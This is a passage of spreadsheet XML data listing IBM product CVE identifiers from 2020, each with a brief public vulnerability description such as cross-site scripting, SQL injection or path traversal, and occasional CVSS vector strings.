    <t>IBM QRadar SIEM 7.4.2 GA to 7.4.2 Patch 1, 7.4.0 to 7.4.1 Patch 1, and 7.3.0 to 7.3.3 Patch 5 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 189302.</t>
  </si>
  <si>
    <t>CVE-2020-4790</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow a user to cause a denial of service due to improperly validating a supplied URL, rendering the application unusuable. IBM X-Force ID: 189375.</t>
  </si>
  <si>
    <t>CVE-2020-4791</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow an attacker to obtain sensitive information using main in the middle attacks due to improper certificate validation. IBM X-Force ID: 189379.</t>
  </si>
  <si>
    <t>CVE-2020-4792</t>
  </si>
  <si>
    <t>IBM Edge 4.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 189441.</t>
  </si>
  <si>
    <t>CVE-2020-4794</t>
  </si>
  <si>
    <t>IBM Automation Workstream Services 19.0.3, 20.0.1, 20.0.2, IBM Business Automation Workflow 18.0, 19.0, and 20.0 and IBM Business Process Manager 8.6 could allow an authenticated user to obtain sensitive information or cuase a denial of service due to iimproper authorization checking. IBM X-Force ID: 189445.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-4795</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could disclose sensitive information to an unauthorized user using a specially crafted HTTP request. IBM X-Force ID: 189446.</t>
  </si>
  <si>
    <t>CVE-2020-4799</t>
  </si>
  <si>
    <t>IBM Informix spatial 14.10 could allow a local user to execute commands as a privileged user due to an out of bounds write vulnerability. IBM X-Force ID: 189460.</t>
  </si>
  <si>
    <t>CVE-2020-4803</t>
  </si>
  <si>
    <t>IBM Edge 4.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 189535.</t>
  </si>
  <si>
    <t>CVE-2020-4805</t>
  </si>
  <si>
    <t>IBM Edge 4.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 189539.</t>
  </si>
  <si>
    <t>CVE-2020-4809</t>
  </si>
  <si>
    <t>IBM Edge 4.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 189633.</t>
  </si>
  <si>
    <t>CVE-2020-4811</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.4.0.0, 1.5.0.0, 1.5.0.1, 1.6.0.0, and 1.6.0.1 could allow a privileged user to inject inject malicious data using a specially crafted HTTP request due to improper input validation.</t>
  </si>
  <si>
    <t>CVE-2020-4815</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.4.0.0 could allow a remote user to obtain sensitive information from HTTP response headers that could be used in further attacks against the system.</t>
  </si>
  <si>
    <t>CVE-2020-4816</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.4.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 189703.</t>
  </si>
  <si>
    <t>CVE-2020-4820</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.4.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2020-4821</t>
  </si>
  <si>
    <t>IBM InfoSphere Data Replication 11.4 and IBM InfoSphere Change Data Capture for z/OS 10.2.1, under certain configurations, could allow a user to bypass authentication mechanisms using an empty password string. IBM X-Force ID: 189834</t>
  </si>
  <si>
    <t>CVE-2020-4825</t>
  </si>
  <si>
    <t>IBM API Connect 10.0.0.0 through 10.0.1.0 and 2018.4.1.0 through 2018.4.1.13 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 189839.</t>
  </si>
  <si>
    <t>CVE-2020-4826</t>
  </si>
  <si>
    <t>IBM API Connect 10.0.0.0 through 10.0.1.0 and 2018.4.1.0 through 2018.4.1.13 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 189840.</t>
  </si>
  <si>
    <t>CVE-2020-4827</t>
  </si>
  <si>
    <t>IBM API Connect 10.0.0.0 through 10.0.1.0 and 2018.4.1.0 through 2018.4.1.13 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 189841.</t>
  </si>
  <si>
    <t>CVE-2020-4828</t>
  </si>
  <si>
    <t>IBM API Connect 10.0.0.0 through 10.0.1.0 and 2018.4.1.0 through 2018.4.1.13 is vulnerable to web cache poisoning, caused by improper input validation by modifying HTTP request headers. IBM X-Force ID: 189842.</t>
  </si>
  <si>
    <t>CVE-2020-4829</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user to exploit a vulnerability in the ksu user command to gain root privileges. IBM X-Force ID: 189960.</t>
  </si>
  <si>
    <t>CVE-2020-4831</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 10.0.0.0 through 10.0.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 189965.</t>
  </si>
  <si>
    <t>CVE-2020-4832</t>
  </si>
  <si>
    <t>IBM PowerHA 7.2 could allow a local attacker to obtain sensitive information from temporary directories after a discovery failure occurs. IBM X-Force ID: 189969.</t>
  </si>
  <si>
    <t>CVE-2020-4838</t>
  </si>
  <si>
    <t>IBM API Connect 5.0.0.0 through 5.0.8.10 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190036.</t>
  </si>
  <si>
    <t>CVE-2020-4839</t>
  </si>
  <si>
    <t>IBM Host firmware for LC-class Systems is vulnerable to a stack based buffer overflow, caused by improper bounds checking. A remote privileged attacker could exploit this vulnerability and cause a denial of service. IBM X-Force ID: 190037.</t>
  </si>
  <si>
    <t>CVE-2020-4840</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially 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90044.</t>
  </si>
  <si>
    <t>CVE-2020-4841</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.6 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 190045.</t>
  </si>
  <si>
    <t>CVE-2020-4842</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.6 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 190046.</t>
  </si>
  <si>
    <t>CVE-2020-4843</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.6 stores potentially sensitive information in config files that could be read by an authenticated user. IBM X-Force ID: 190048.</t>
  </si>
  <si>
    <t>CVE-2020-4845</t>
  </si>
  <si>
    <t>IBM Security Key Lifecycle Manager 3.0.1 and 4.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190289.</t>
  </si>
  <si>
    <t>CVE-2020-4846</t>
  </si>
  <si>
    <t>IBM Security Key Lifecycle Manager 3.0.1 and 4.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 190290.</t>
  </si>
  <si>
    <t>CVE-2020-4848</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 6.2.7.9, 7.0.5.4, and 7.1.1.1 could allow an authenticated user to initiate a plugin or compare process resources that they should not have access to. IBM X-Force ID: 190293.</t>
  </si>
  <si>
    <t>CVE-2020-4849</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool Impact 7.1.0.0 through 7.1.0.19 Interim Fix 7 could allow a remote attacker to bypass security restrictions, caused by a reverse tabnabbing flaw. An attacker could exploit this vulnerability and redirect a vitcim to a phishing site. IBM X-Force ID: 190294.</t>
  </si>
  <si>
    <t>CVE-2020-4850</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 1.1.1.0 through 1.1.8.4 Transparent Cloud Tiering could allow a remote attacker to obtain sensitive information, caused by the leftover files after configuration. IBM X-Force ID: 190298.</t>
  </si>
  <si>
    <t>CVE-2020-4851</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.5 and 5.1.0 through 5.1.0.2 could allow a local user to poison log files which could impact support and development efforts. IBM X-Force ID: 190450.</t>
  </si>
  <si>
    <t>CVE-2020-4854</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 thorugh 10.1.6 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 190454.</t>
  </si>
  <si>
    <t>CVE-2020-4855</t>
  </si>
  <si>
    <t>IBM Jazz Foundation products is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190457.</t>
  </si>
  <si>
    <t>CVE-2020-4856</t>
  </si>
  <si>
    <t>IBM Engineering products are vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190459.</t>
  </si>
  <si>
    <t>CVE-2020-4857</t>
  </si>
  <si>
    <t>IBM Engineering products are vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190460.</t>
  </si>
  <si>
    <t>CVE-2020-4863</t>
  </si>
  <si>
    <t>IBM Engineering products are vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190566.</t>
  </si>
  <si>
    <t>CVE-2020-4864</t>
  </si>
  <si>
    <t>IBM Resilient SOAR V38.0 could allow an attacker on the internal net work to provide the server with a spoofed source IP address. IBM X-Force ID: 190567.</t>
  </si>
  <si>
    <t>CVE-2020-4865</t>
  </si>
  <si>
    <t>IBM Jazz Foundation products is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190741.</t>
  </si>
  <si>
    <t>CVE-2020-4866</t>
  </si>
  <si>
    <t>IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190742.</t>
  </si>
  <si>
    <t>CVE-2020-4869</t>
  </si>
  <si>
    <t>IBM MQ Appliance 9.2 CD and 9.2 LTS is vulnerable to a denial of service, caused by a buffer overflow. A remote attacker could send a specially crafted SNMP query to cause the appliance to reload. IBM X-Force ID: 190831.</t>
  </si>
  <si>
    <t>CVE-2020-4870</t>
  </si>
  <si>
    <t>IBM MQ 9.2 CD and LTS are vulnerable to a denial of service attack caused by an error processing connecting applications. IBM X-Force ID: 190833.</t>
  </si>
  <si>
    <t>CVE-2020-4871</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 190834.</t>
  </si>
  <si>
    <t>CVE-2020-4873</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could allow an attacker to obtain sensitive information due to an overly permissive CORS policy. IBM X-Force ID: 190836.</t>
  </si>
  <si>
    <t>CVE-2020-4875</t>
  </si>
  <si>
    <t>IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 190838.</t>
  </si>
  <si>
    <t>CVE-2020-4876</t>
  </si>
  <si>
    <t>IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 190839.</t>
  </si>
  <si>
    <t>CVE-2020-4877</t>
  </si>
  <si>
    <t>IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 could be vulnerable to unauthorized modifications by using public fields in public classes. IBM X-Force ID: 190843.</t>
  </si>
  <si>
    <t>CVE-2020-4879</t>
  </si>
  <si>
    <t>IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 could allow a remote attacker to bypass security restrictions, caused by improper validation of authentication cookies. IBM X-Force ID: 190847.</t>
  </si>
  <si>
    <t>CVE-2020-4881</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could allow a remote attacker to obtain sensitive information, caused by the lack of server hostname verification for SSL/TLS communication. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information. IBM X-Force ID: 190851.</t>
  </si>
  <si>
    <t>CVE-2020-4882</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could be vulnerable to a Server-Side Request Forgery (SSRF) attack by constucting URLs from user-controlled data . This could enable attackers to make arbitrary requests to the internal network or to the local file system. IBM X-Force ID: 190852.</t>
  </si>
  <si>
    <t>CVE-2020-4883</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 could disclose sensitive information about other domains which could be used in further attacks against the system. IBM X-Force ID: 190907.</t>
  </si>
  <si>
    <t>CVE-2020-4884</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 6.2.7.9, 7.0.5.4, and 7.1.1.1 stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 190908.</t>
  </si>
  <si>
    <t>CVE-2020-4885</t>
  </si>
  <si>
    <t>IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow a local user to access and change the configuration of Db2 due to a race condition of a symbolic link,. IBM X-Force ID: 190909.</t>
  </si>
  <si>
    <t>CVE-2020-4886</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 stores sensitive information in the browser's history that could be obtained by a user who has access to the same system. IBM X-Force ID: 190910.</t>
  </si>
  <si>
    <t>CVE-2020-4887</t>
  </si>
  <si>
    <t>IBM AIX 7.1, 7.2 and AIX VIOS 3.1 could allow a local user to exploit a vulnerability in the gencore user command to create arbitrary files in any directory. IBM X-Force ID: 190911.</t>
  </si>
  <si>
    <t>CVE-2020-4888</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.4.0 to 7.4.2 Patch 1 and 7.3.0 to 7.3.3 Patch 7 could allow a remote attacker to execute arbitrary commands on the system, caused by insecure deserialization of user-supplied content by the Java deserialization function. By sending a malicious serialized Java object, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 190912.</t>
  </si>
  <si>
    <t>CVE-2020-4889</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.4 and 5.1.0 could allow a local user to poison log files which could impact support and development efforts. IBM X-Force ID: 190971.</t>
  </si>
  <si>
    <t>CVE-2020-4890</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.5 and 5.1.0 through 5.1.0.2 could allow a local user with a valid role to the REST API to cause a denial of service due to weak or absense of rate limiting. IBM X-Force ID: 190973.</t>
  </si>
  <si>
    <t>CVE-2020-4891</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.5 and 5.1.0 through 5.1.0.2 uses an inadequate account lockout setting that could allow a local user er to brute force Rest API account credentials. IBM X-Force ID: 190974.</t>
  </si>
  <si>
    <t>CVE-2020-4892</t>
  </si>
  <si>
    <t>IBM Emptoris Contract Management 10.1.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190979.</t>
  </si>
  <si>
    <t>CVE-2020-4893</t>
  </si>
  <si>
    <t>IBM Emptoris Strategic Supply Management 10.1.0, 10.1.1, and 10.1.3 transmits sensitive information in HTTP GET request parameters. This may lead to information disclosure via man in the middle methods. IBM X-Force ID: 190984.</t>
  </si>
  <si>
    <t>CVE-2020-4895</t>
  </si>
  <si>
    <t>IBM Emptoris Strategic Supply Management 10.1.0, 10.1.1, and 10.1.3 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 190986.</t>
  </si>
  <si>
    <t>CVE-2020-4896</t>
  </si>
  <si>
    <t>IBM Emptoris Sourcing 10.1.0, 10.1.1, and 10.1.3 is vulnerable to web cache poisoning, caused by improper input validation by modifying HTTP request headers. IBM X-Force ID: 190987.</t>
  </si>
  <si>
    <t>CVE-2020-4897</t>
  </si>
  <si>
    <t>IBM Emptoris Contract Management and IBM Emptoris Spend Analysis 10.1.0, 10.1.1, and 10.1.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 190988.</t>
  </si>
  <si>
    <t>CVE-2020-4898</t>
  </si>
  <si>
    <t>IBM Emptoris Strategic Supply Management 10.1.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 190989.</t>
  </si>
  <si>
    <t>CVE-2020-4899</t>
  </si>
  <si>
    <t>IBM API Connect 5.0.0.0 through 5.0.8.10 could potentially leak sensitive information or allow for data corruption due to plain text transmission of sensitive information across the network. IBM X-Force ID: 190990.</t>
  </si>
  <si>
    <t>CVE-2020-4900</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 19.0.0.3 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 190991.</t>
  </si>
  <si>
    <t>CVE-2020-4901</t>
  </si>
  <si>
    <t>IBM Robotic Process Automation with Automation Anywhere 11.0 could allow an attacker on the network to obtain sensitive information or cause a denial of service through username enumeration. IBM X-Force ID: 190992.</t>
  </si>
  <si>
    <t>CVE-2020-4902</t>
  </si>
  <si>
    <t>IBM Datacap Taskmaster Capture (IBM Datacap Navigator 9.1.7) is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 191045.</t>
  </si>
  <si>
    <t>CVE-2020-4903</t>
  </si>
  <si>
    <t>IBM API Connect V10 and V2018 could allow an attacker who has intercepted a registration invitation link to impersonate the registered user or obtain sensitive information. IBM X-Force ID: 191105.</t>
  </si>
  <si>
    <t>CVE-2020-4904</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.</t>
  </si>
  <si>
    <t>CVE-2020-4905</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 could allow an remote attacker to obtain sensitive information, caused by a man in the middle attack. By SSL striping, an attacker could exploit this vulnerability to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-4906</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 allows web pages to be stored locally which can be read by another user on the system.</t>
  </si>
  <si>
    <t>CVE-2020-4907</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.</t>
  </si>
  <si>
    <t>CVE-2020-4908</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 returns the product version and release information on the login dialog. This information could be used in further attacks against the system.</t>
  </si>
  <si>
    <t>CVE-2020-4909</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 191273.</t>
  </si>
  <si>
    <t>CVE-2020-4910</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 191274.</t>
  </si>
  <si>
    <t>CVE-2020-4912</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 Self Service Console could allow a privilege escalation by capturing the user request URL when logged in as a privileged user. IBM X-Force ID: 191287.</t>
  </si>
  <si>
    <t>CVE-2020-4913</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 could reveal credential information in the HTTP response to a local privileged user. IBM X-Force ID: 191288.</t>
  </si>
  <si>
    <t>CVE-2020-4916</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 191390.</t>
  </si>
  <si>
    <t>CVE-2020-4917</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 191391.</t>
  </si>
  <si>
    <t>CVE-2020-4918</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 could allow l local privileged user to disclose sensitive information due to an insecure direct object reference in sell service console for the Platform System Manager. IBM X-Force ID: 191392.</t>
  </si>
  <si>
    <t>CVE-2020-4919</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 has insufficient logout controls which could allow an authenticated privileged user to impersonate another user on the system. IBM X-Force ID: 191395.</t>
  </si>
  <si>
    <t>CVE-2020-4920</t>
  </si>
  <si>
    <t>IBM Jazz Team Server products are vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 191396.</t>
  </si>
  <si>
    <t>CVE-2020-4921</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.6 and 11.2 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 191398.</t>
  </si>
  <si>
    <t>CVE-2020-4925</t>
  </si>
  <si>
    <t>A security vulnerability in the Spectrum Scale 5.0 and 5.1 allows a non-root user to overflow the mmfsd daemon with requests and preventing the daemon to service other requests. IBM X-Force ID: 191599.</t>
  </si>
  <si>
    <t>CVE-2020-4926</t>
  </si>
  <si>
    <t>A vulnerability in the Spectrum Scale 5.1 core component and IBM Elastic Storage System 6.1 could allow unauthorized access to user data or injection of arbitrary data in the communication protocol. IBM X-Force ID: 191600.</t>
  </si>
  <si>
    <t>CVE-2020-4928</t>
  </si>
  <si>
    <t>IBM Cloud Pak System 2.3 could allow a local privileged attacker to upload arbitrary files. By intercepting the request and modifying the file extention, the attacker could execute arbitrary code on the server. IBM X-Force ID: 191705.</t>
  </si>
  <si>
    <t>CVE-2020-4929</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 191706.</t>
  </si>
  <si>
    <t>CVE-2020-4931</t>
  </si>
  <si>
    <t>IBM MQ 9.1 LTS, 9.2 LTS, and 9.1 CD AMQP Channels could allow an authenticated user to cause a denial of service due to an issue processing messages. IBM X-Force ID: 191747.</t>
  </si>
  <si>
    <t>CVE-2020-4932</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 191748.</t>
  </si>
  <si>
    <t>CVE-2020-4933</t>
  </si>
  <si>
    <t>IBM Jazz Reporting Service 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 191751.</t>
  </si>
  <si>
    <t>CVE-2020-4934</t>
  </si>
  <si>
    <t>IBM Content Navigator 3.0.CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 191752.</t>
  </si>
  <si>
    <t>CVE-2020-4935</t>
  </si>
  <si>
    <t>IBM Datacap Fastdoc Capture (IBM Datacap Navigator 9.1.7 ) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 191753.</t>
  </si>
  <si>
    <t>CVE-2020-4937</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 191814.</t>
  </si>
  <si>
    <t>CVE-2020-4938</t>
  </si>
  <si>
    <t>IBM MQ Appliance 9.1 and 9.2 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 191815.</t>
  </si>
  <si>
    <t>CVE-2020-4941</t>
  </si>
  <si>
    <t>IBM Edge 4.2 could reveal sensitive version information about the server from error pages that could aid an attacker in further attacks against the system. IBM X-Force ID: 191941.</t>
  </si>
  <si>
    <t>CVE-2020-4942</t>
  </si>
  <si>
    <t>IBM Curam Social Program Management 7.0.9 and 7.0.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 191942.</t>
  </si>
  <si>
    <t>CVE-2020-4944</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 7.0.3.0, 7.0.4.0, 7.0.5.3, 7.0.5.4, 7.1.0.0, 7.1.1.0, 7.1.1.1, and 7.1.1.2, stores keystore passwords in plain text after a manual edit, which can be read by a local user. IBM X-Force ID: 191944.</t>
  </si>
  <si>
    <t>CVE-2020-4945</t>
  </si>
  <si>
    <t>IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user to overwrite arbirary files due to improper group permissions. IBM X-Force ID: 191945.</t>
  </si>
  <si>
    <t>CVE-2020-4949</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 192025.</t>
  </si>
  <si>
    <t>CVE-2020-4951</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7 and 11.2.0 contains locally cached browser data, that could allow a local attacker to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-4952</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 could allow an authenticated user to gain root access due to improper access control. IBM X-Force ID: 192028.</t>
  </si>
  <si>
    <t>CVE-2020-4953</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could allow a remote authenticated attacker to obtain information about an organization's internal structure by exposing sensitive information in HTTP repsonses. IBM X-Force ID: 192029.</t>
  </si>
  <si>
    <t>CVE-2020-4954</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Operations Center 7.1 and 8.1 could allow a remote attacker to bypass authentication restrictions, caused by improper session validation . By using the configuration panel to obtain a valid session using an attacker controlled IBM Spectrum Protect server, an attacker could exploit this vulnerability to bypass authentication and gain access to a limited number of debug functions, such as logging levels. IBM X-Force ID: 192153.</t>
  </si>
  <si>
    <t>CVE-2020-4955</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Operations Center 7.1 and 8.1could allow a remote attacker to execute arbitrary code on the system, caused by improper parameter validation. By creating an unspecified servlet request with specially crafted input parameters, an attacker could exploit this vulnerability to load a malicious .dll with elevated privileges. IBM X-Force ID: 192155.</t>
  </si>
  <si>
    <t>CVE-2020-4956</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Operations Center 7.1 and 8.1 is vulnerable to a denial of service, caused by a RPC that allows certain cache values to be set and dumped to a file. By setting a grossly large cache value and dumping that cached value to a file multiple times, a remote attacker could exploit this vulnerability to cause the consumption of all memory resources. IBM X-Force ID: 192156.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-4957</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could disclose sensitive information in URL parameters that could aid in future attacks against the system. IBM X-Force ID: 192208.</t>
  </si>
  <si>
    <t>CVE-2020-4958</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. IBM X-Force ID: 192209.</t>
  </si>
